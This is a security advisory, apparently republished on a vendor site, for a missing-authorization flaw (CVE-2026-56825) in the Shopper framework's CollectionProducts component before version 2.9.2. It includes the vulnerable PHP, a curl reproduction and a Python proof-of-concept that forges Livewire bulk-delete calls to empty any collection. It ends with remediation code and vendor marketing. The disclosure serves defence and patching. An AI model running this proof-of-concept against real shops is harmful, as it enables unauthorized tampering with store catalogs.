Summary
Shopper: Missing authorization on product removal actions in CollectionProducts component
Title
Missing authorization on product removal actions in CollectionProducts component
Description
A lack of authorization control was discovered on both the per-record delete action and the bulk delete action inside packages/admin/src/Livewire/Components/Collection/CollectionProducts.php. Neither the Action::make('delete') at line 73 nor the DeleteBulkAction::make() at line 91 carries an ->authorize(...) chain. The component also exposes public Collection $collection without #[Locked], so the collection ID is mutable in the Livewire wire payload. Any authenticated admin-panel session, including staff who hold only browse_collections, can detach individual products or bulk-detach all products from any collection in the database.
Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H Score: 8.1 (High)
Affected files
packages/admin/src/Livewire/Components/Collection/CollectionProducts.php:40,73-88,91-105
// Line 40 - client-mutable, no #[Locked]
public Collection $collection;
// Lines 73-88 - per-record delete action, no ->authorize(...)
->recordActions([
Action::make('delete')
->label(__('shopper::forms.actions.delete'))
->icon(Untitledui::Trash03)
->iconButton()
->color('danger')
->requiresConfirmation()
->action(function (Product $record): void {
$this->collection->products()->detach([$record->id]);
$this->dispatch('collection.add.product');
Notification::make()
->title(__('shopper::pages/collections.remove_product'))
->success()
->send();
}),
])
// Lines 91-105 - bulk remove action, no ->authorize(...)
->groupedBulkActions([
DeleteBulkAction::make()
->label(__('shopper::forms.actions.delete'))
->icon(Untitledui::Trash03)
->requiresConfirmation()
->action(function (EloquentCollection $records): void {
$this->collection->products()->detach($records->pluck('id')->toArray());
$this->dispatch('collection.add.product');
Notification::make()
->title(__('shopper::pages/collections.remove_product'))
->success()
->send();
})
->deselectRecordsAfterCompletion(),
])
Steps to reproduce
Prerequisites: any admin-panel account, including one whose role holds only browse_collections (no edit_collections required).
SESSION="laravel_session=<your_session_value>"
XSRF="X-XSRF-TOKEN: <url-decoded-value-of-XSRF-TOKEN-cookie>"
# Step 1: Note the collection ID you wish to empty (e.g., collection_id=5).
# Step 2: Call the bulk table action on the CollectionProducts component,
# substituting collection ID 5 in the component state.
curl -s -X POST http://localhost/shopper/livewire/update \
-H "Content-Type: application/json" \
-H "X-XSRF-TOKEN: $XSRF" \
-H "Cookie: $SESSION" \
-H "X-Livewire: 1" \
-d '{
"components": [{
"snapshot": "{\"id\":\"COLLECTION_PRODUCTS_COMPONENT_ID\",\"data\":{\"collection\":5},\"checksum\":\"...\"}",
"updates": {},
"calls": [{
"path": "",
"method": "callBulkAction",
"params": ["delete", [1, 2, 3, 4, 5]]
}]
}]
}'
# Expected: HTTP 200, all listed product IDs detached from collection 5,
# regardless of the caller having only browse_collections.
Proof of concept
#!/usr/bin/env python3
"""
CollectionProducts authorization bypass PoC.
Set these environment variables before running:
BASE_URL e.g. http://localhost
SESSION_COOKIE value of the laravel_session cookie
XSRF_TOKEN URL-decoded value of the XSRF-TOKEN cookie
COMPONENT_ID Livewire component snapshot ID (from page source)
COLLECTION_ID integer ID of the target collection
PRODUCT_IDS comma-separated product IDs to detach (e.g. "1,2,3")
"""
import json
import os
import requests
base_url = os.environ['BASE_URL']
session = os.environ['SESSION_COOKIE']
xsrf = os.environ['XSRF_TOKEN']
component_id = os.environ['COMPONENT_ID']
collection_id = int(os.environ['COLLECTION_ID'])
product_ids = [int(x) for x in os.environ['PRODUCT_IDS'].split(',')]
headers = {
'Content-Type': 'application/json',
'Accept': 'text/html, application/xhtml+xml',
'X-XSRF-TOKEN': xsrf,
'Cookie': f'laravel_session={session}',
'X-Livewire': '1',
}
snapshot = json.dumps({
'id': component_id,
'data': {'collection': collection_id},
'checksum': 'UNLOCKED_PROP_NO_CHECKSUM_NEEDED',
})
payload = {
'components': [{
'snapshot': snapshot,
'updates': {},
'calls': [{
'path': '',
'method': 'callBulkAction',
'params': ['delete', product_ids],
}]
}]
}
r = requests.post(f'{base_url}/shopper/livewire/update', headers=headers, json=payload)
print(f'Status: {r.status_code}')
print(r.text[:500])
Credits
Reported by Vishal Shukla (@shukla304 / @therawdev).
Impact
A staff member holding only browse_collections can silently empty any collection by detaching all of its products. Collections drive storefront catalog grouping; removing products from a collection breaks the associated landing pages and promotions for those product groups. Because $collection is not locked, the attacker is not limited to the collection they navigated to: they can target any collection ID in the database, including featured promotional collections they have never viewed.
The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.
CVE-2026-56825 has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.9.2); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
// packages/admin/src/Livewire/Components/Collection/CollectionProducts.php
use Livewire\Attributes\Locked;
#[Locked] // prevent client-side ID substitution
public Collection $collection;
// Per-record action:
Action::make('delete')
->authorize('edit_collections') // add this
->action(function (Product $record): void {
$this->collection->products()->detach([$record->id]);
// ...
}),
// Bulk action:
DeleteBulkAction::make()
->authorize('edit_collections') // add this
->action(function (EloquentCollection $records): void {
$this->collection->products()->detach($records->pluck('id')->toArray());
// ...
})
Frequently Asked Questions
- What is CVE-2026-56825? CVE-2026-56825 is a high-severity missing authorization vulnerability in shopper/framework (composer), affecting versions < 2.9.2. It is fixed in 2.9.2. The application does not perform an authorization check before performing a sensitive operation.
- How severe is CVE-2026-56825? CVE-2026-56825 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of shopper/framework are affected by CVE-2026-56825? shopper/framework (composer) versions < 2.9.2 is affected.
- Is there a fix for CVE-2026-56825? Yes. CVE-2026-56825 is fixed in 2.9.2. Upgrade to this version or later.
- Is CVE-2026-56825 exploitable, and should I be worried? Whether CVE-2026-56825 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-56825 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-56825? Upgrade
shopper/frameworkto 2.9.2 or later.